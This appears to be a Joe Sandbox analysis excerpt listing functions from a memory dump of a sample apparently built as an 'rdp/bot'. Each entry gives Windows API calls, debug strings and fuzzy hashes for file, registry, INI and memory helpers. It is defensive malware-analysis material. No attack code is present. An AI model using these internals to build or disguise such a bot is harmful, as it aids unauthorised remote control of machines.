(attr != NULL), xrefs: 00007FF7C1AB45EB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB45CE, 00007FF7C1AB45F9
fs_attr_set, xrefs: 00007FF7C1AB45C7, 00007FF7C1AB45F2, 00007FF7C1AB463E, 00007FF7C1AB470D, 00007FF7C1AB4773
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB45B9, 00007FF7C1AB45E4
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FF7C1AB4714

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3085771803
Opcode ID: 58f23fa2416bd7a25debecb8366120f3225b44e788bd1bbcb70f401e2d99b19e
Instruction ID: 15f149f342de735043aeb8437d0163b44cf5367734515083d3dc40b11fbb7174
Opcode Fuzzy Hash: 58f23fa2416bd7a25debecb8366120f3225b44e788bd1bbcb70f401e2d99b19e
Instruction Fuzzy Hash: 9D516B70A0C68ACEF760EF50A460ABDE650AF113A8F944133DD1F87794EEACE845C721

Function 00007FF7C1AB8DF8 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyExA.ADVAPI32 ref: 00007FF7C1AB8E1B

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

NULL, xrefs: 00007FF7C1AB9028
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FF7C1AB8E38
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB8E6B, 00007FF7C1AB8E9B
(key != NULL), xrefs: 00007FF7C1AB8E8D
(root != NULL), xrefs: 00007FF7C1AB8E5D
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF7C1AB8E56, 00007FF7C1AB8E86
[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF7C1AB8EF4
u, xrefs: 00007FF7C1AB8E7E
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FF7C1AB8ECD
registry_delete_key, xrefs: 00007FF7C1AB8E31, 00007FF7C1AB8E64, 00007FF7C1AB8E94, 00007FF7C1AB8EC6, 00007FF7C1AB8EED

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Deletefflushfwrite
String ID: (key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
API String ID: 2939363742-1701293196
Opcode ID: 1842f1961a00c6416b9b9875017d59ef9b338ca12cf8e6a2438a96b6c57708fa
Instruction ID: 2285076ecc6dad6c77df3bb054083d2800b7d7a3e544b8dfbab9a30c9f234a31
Opcode Fuzzy Hash: 1842f1961a00c6416b9b9875017d59ef9b338ca12cf8e6a2438a96b6c57708fa
Instruction Fuzzy Hash: 514115B2D0C1A391FB24BE18A850ABCE2406F00774FC94133DD4E676A0DEADED9593A1

Function 00007FF7C1AB6C53 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32(?,?,?,?,?,?,00000000,00000157C50713D0,?,00007FF7C1AB1B41,?,?,00000000,00007FF7C1AB1E55), ref: 00007FF7C1AB6C9B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000157C50713D0,?,00007FF7C1AB1B41,?,?,00000000,00007FF7C1AB1E55), ref: 00007FF7C1AB6CAC

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000157C50713D0,?,00007FF7C1AB1B41,?,?,00000000,00007FF7C1AB1E55), ref: 00007FF7C1AB6D62

Strings

[I] (%s) -> Done(lock=%p), xrefs: 00007FF7C1AB6CBC
(lock != NULL), xrefs: 00007FF7C1AB6CE3
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FF7C1AB6D4D
fs_file_unlock, xrefs: 00007FF7C1AB6CB5, 00007FF7C1AB6CEA, 00007FF7C1AB6D1B, 00007FF7C1AB6D46, 00007FF7C1AB6D70
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB6CF1, 00007FF7C1AB6D22
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FF7C1AB6D77
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB6CDC, 00007FF7C1AB6D0D
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FF7C1AB6D14

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-1436771859
Opcode ID: 5f7bac4c167d1b71eca64439f564aec4648d61132f1d68ca14babe0d5e14d78c
Instruction ID: a77f8bf7d8d866bd8def64c002f64adee8b2d4d3dee066d425b99f9c2c5cd74a
Opcode Fuzzy Hash: 5f7bac4c167d1b71eca64439f564aec4648d61132f1d68ca14babe0d5e14d78c
Instruction Fuzzy Hash: 20410BB2B0C98380FB24EF15E450EBCA7516B507B8FD40233DD1D176E49EADA58AD721

Function 00007FF7C1AB23D2 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7C1AB23F5
GetLastError.KERNEL32 ref: 00007FF7C1AB243C

Strings

~, xrefs: 00007FF7C1AB24BA
(mi != NULL), xrefs: 00007FF7C1AB241B
sys_mem_info, xrefs: 00007FF7C1AB2422, 00007FF7C1AB2447
[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu), xrefs: 00007FF7C1AB244E
, xrefs: 00007FF7C1AB245A
P, xrefs: 00007FF7C1AB24BF
;, xrefs: 00007FF7C1AB240C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB2429
C:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FF7C1AB2414

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorGlobalLastMemoryStatus
String ID: $(mi != NULL)$;$C:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
API String ID: 3848946878-3004215591
Opcode ID: 7eed2eaf22c4293db66055f8990370d3c67f6fe97e497cdea4d91ffcfe9a506c
Instruction ID: 2ddd3c46c05fbd29cd373589e8b007b16b6a867e3fcde02c4ad70c21da09398e
Opcode Fuzzy Hash: 7eed2eaf22c4293db66055f8990370d3c67f6fe97e497cdea4d91ffcfe9a506c
Instruction Fuzzy Hash: C631E061E1C68382FB28EF149594BBD92609F54324E905633C90E07693DEDEB9C6D221

Function 00007FF7C1AB744C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF7C1AB75AF,?,?,?,?,?,00000157C50713D0,00007FF7C1AB76AA), ref: 00007FF7C1AB747B
GetLastError.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF7C1AB75AF,?,?,?,?,?,00000157C50713D0,00007FF7C1AB76AA), ref: 00007FF7C1AB7486

Strings

(path != NULL), xrefs: 00007FF7C1AB7534
(path_sz != NULL), xrefs: 00007FF7C1AB7567
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF7C1AB74DE
fs_module_path, xrefs: 00007FF7C1AB749E, 00007FF7C1AB74D7, 00007FF7C1AB750B, 00007FF7C1AB753B, 00007FF7C1AB756E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB7512, 00007FF7C1AB7542, 00007FF7C1AB7575
RDP-Controller.lock, xrefs: 00007FF7C1AB744C
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB74FD, 00007FF7C1AB752D, 00007FF7C1AB7560
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF7C1AB74A5
(hnd != NULL), xrefs: 00007FF7C1AB7504

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$RDP-Controller.lock$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
API String ID: 2776309574-624244044
Opcode ID: b356d9d339ff3bce16533a7ec599c8f5233e65cd9eb1d3b1fa64c6b1b99d23ed
Instruction ID: 3df286c6bedf2c9433e34a6d3a23cf6663caca5f1f470ed3257ae70fe2548a24
Opcode Fuzzy Hash: b356d9d339ff3bce16533a7ec599c8f5233e65cd9eb1d3b1fa64c6b1b99d23ed
Instruction Fuzzy Hash: 89313971A08A8785FB10EF95E820FBCA650AF107A8FC45133DD0D17795EEEEA909C320

Function 00007FF7C1AB6313 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF7C1AB6359
GetFileSize.KERNEL32 ref: 00007FF7C1AB637C
CloseHandle.KERNEL32 ref: 00007FF7C1AB639E
GetLastError.KERNEL32 ref: 00007FF7C1AB6424
GetLastError.KERNEL32 ref: 00007FF7C1AB64EA

Strings

(path != NULL), xrefs: 00007FF7C1AB63D3
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB63E1, 00007FF7C1AB6411
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB63CC, 00007FF7C1AB63FC
fs_file_size, xrefs: 00007FF7C1AB63DA, 00007FF7C1AB640A
(size != NULL), xrefs: 00007FF7C1AB6403

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-1687387729
Opcode ID: 52b29fbd4fff55175774032e9108d3912dfcd6ade1272cc7db0221750685e0b2
Instruction ID: 65fb814c140807d7e8fd12b0057a9f60145f1af21c2049e86ac69befad89cd71
Opcode Fuzzy Hash: 52b29fbd4fff55175774032e9108d3912dfcd6ade1272cc7db0221750685e0b2
Instruction Fuzzy Hash: 13613B31D0D59282FB60EE14A558B7CD2519F00378FA90633CC1F9B2E5DEADBC869661

Function 00007FF7C1AB6634 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF7C1AB6693
GetFileTime.KERNEL32 ref: 00007FF7C1AB66AE
GetLastError.KERNEL32 ref: 00007FF7C1AB66BC
CloseHandle.KERNEL32 ref: 00007FF7C1AB67DE

Strings

(path != NULL), xrefs: 00007FF7C1AB66F0
fs_file_stat, xrefs: 00007FF7C1AB66F7, 00007FF7C1AB672A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB66FE, 00007FF7C1AB6731
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB66E9, 00007FF7C1AB671C
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FF7C1AB6723

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-3647951244
Opcode ID: c80f473890539df45e4c0d59242f093770392ccd82f549712a2b1bf366d56230
Instruction ID: 42c45fdd387d680414d2c84a106a2f8561e47becadf6fe6fa078b2a0d042078a
Opcode Fuzzy Hash: c80f473890539df45e4c0d59242f093770392ccd82f549712a2b1bf366d56230
Instruction Fuzzy Hash: 1A5160B1E0C29282FB61AF509554F7DD250AF007B8F984633DD1D4B7E0EEADA8868361

Function 00007FF7C1AB3BD0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF7C1AB3C6E
strtol.MSVCRT ref: 00007FF7C1AB3C84
_errno.MSVCRT ref: 00007FF7C1AB3C8C
_errno.MSVCRT ref: 00007FF7C1AB3C94

Strings

C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF7C1AB3C3F
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF7C1AB3CBC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB3C54
ini_get_uint16, xrefs: 00007FF7C1AB3C4D, 00007FF7C1AB3CB5
(value != NULL), xrefs: 00007FF7C1AB3C46

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: _errno$strtol
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 3596500743-1991603811
Opcode ID: 79175df2b687a8a8d7f1141da658f3e1b7b0606fc6674cf03db3b69883c99b44
Instruction ID: b846ce74aa17c2909bbcd4270157696ad90c3f78d0b138c9cd278df54b76b71b
Opcode Fuzzy Hash: 79175df2b687a8a8d7f1141da658f3e1b7b0606fc6674cf03db3b69883c99b44
Instruction Fuzzy Hash: 43217E31A0868391E710EF56A850BAEB720BF857A4F804133DE4C07764DFBDE886D720

Function 00007FF7C1AB3EC4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF7C1AB3F60
_strtoui64.MSVCRT ref: 00007FF7C1AB3F76
_errno.MSVCRT ref: 00007FF7C1AB3F80
_errno.MSVCRT ref: 00007FF7C1AB3F8C

Strings

C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF7C1AB3F31
ini_get_uint64, xrefs: 00007FF7C1AB3F3F, 00007FF7C1AB3FAC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB3F46
(value != NULL), xrefs: 00007FF7C1AB3F38
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF7C1AB3FB3

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 7d68ca7b8cc9e4de448433a8525fc56b3e75110361bbb132b1ea392003ac8ac3
Instruction ID: 253201d1310a567e06518b33b52c676ace01f975a9845996b40c2bce0fcaa851
Opcode Fuzzy Hash: 7d68ca7b8cc9e4de448433a8525fc56b3e75110361bbb132b1ea392003ac8ac3
Instruction Fuzzy Hash: 1A216B71608A8795E711EF55F850BAEB260AB847A4F848033EE4C47754DFBDE985C720

Function 00007FF7C1AB7689 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB7702
strlen.MSVCRT ref: 00007FF7C1AB771E
_mbscat.MSVCRT ref: 00007FF7C1AB772D
strlen.MSVCRT ref: 00007FF7C1AB7738

Strings

fs_module_file, xrefs: 00007FF7C1AB76E5
service, xrefs: 00007FF7C1AB768C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB76EC
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB76D7
(file_path != NULL), xrefs: 00007FF7C1AB76DE

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$_mbscat
String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file$service
API String ID: 3951308622-1028023324
Opcode ID: 555ce83f1a7f58de38076c6efa6d56c9e194a2ccc4c1a4ca5d422a016d7d6344
Instruction ID: d9c8807c55fa33dd566adabb367da74b1b3fb6014bf24663b730c273a3b1a320
Opcode Fuzzy Hash: 555ce83f1a7f58de38076c6efa6d56c9e194a2ccc4c1a4ca5d422a016d7d6344
Instruction Fuzzy Hash: D3116D71A086C344FB15FE699D20BBDAA911F157E8F885032DE4D0B3D6DEAD980582A0

Function 00007FF7C1AB39A0 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF7C1AB3A8C

Strings

C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF7C1AB39DB, 00007FF7C1AB3A0E, 00007FF7C1AB3A41
ini_get_var, xrefs: 00007FF7C1AB39E9, 00007FF7C1AB3A1C, 00007FF7C1AB3A4F, 00007FF7C1AB3AB6, 00007FF7C1AB3AFE
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FF7C1AB3B05
(var != NULL), xrefs: 00007FF7C1AB3A48
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB39F0, 00007FF7C1AB3A23, 00007FF7C1AB3A56
(name != NULL), xrefs: 00007FF7C1AB3A15
(sec != NULL), xrefs: 00007FF7C1AB39E2
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FF7C1AB3ABD
NULL, xrefs: 00007FF7C1AB3B1E, 00007FF7C1AB3B27

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: dabe79df07e4a5a8dd397160ec46bd02f00771210cc9d8bdbbda1e8125300aed
Instruction ID: 38625713c663f967fa4355277a03585183a9f72ca30d79c3e181b96c229c2a6f
Opcode Fuzzy Hash: dabe79df07e4a5a8dd397160ec46bd02f00771210cc9d8bdbbda1e8125300aed
Instruction Fuzzy Hash: ED410471B0868791FB10EF55A950BBCA260AF04368F948137DE4D07695DFBEEA86C360

Function 00007FF7C1AB3819 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF7C1AB390D

Strings

C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF7C1AB3854, 00007FF7C1AB3887, 00007FF7C1AB38BA
[D] (%s) -> Done(name=%s), xrefs: 00007FF7C1AB392D
(ini != NULL), xrefs: 00007FF7C1AB385B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB3869, 00007FF7C1AB389C, 00007FF7C1AB38CF
(name != NULL), xrefs: 00007FF7C1AB388E
ini_get_sec, xrefs: 00007FF7C1AB3862, 00007FF7C1AB3895, 00007FF7C1AB38C8, 00007FF7C1AB3926, 00007FF7C1AB3964
(sec != NULL), xrefs: 00007FF7C1AB38C1
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF7C1AB396B
NULL, xrefs: 00007FF7C1AB3984

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
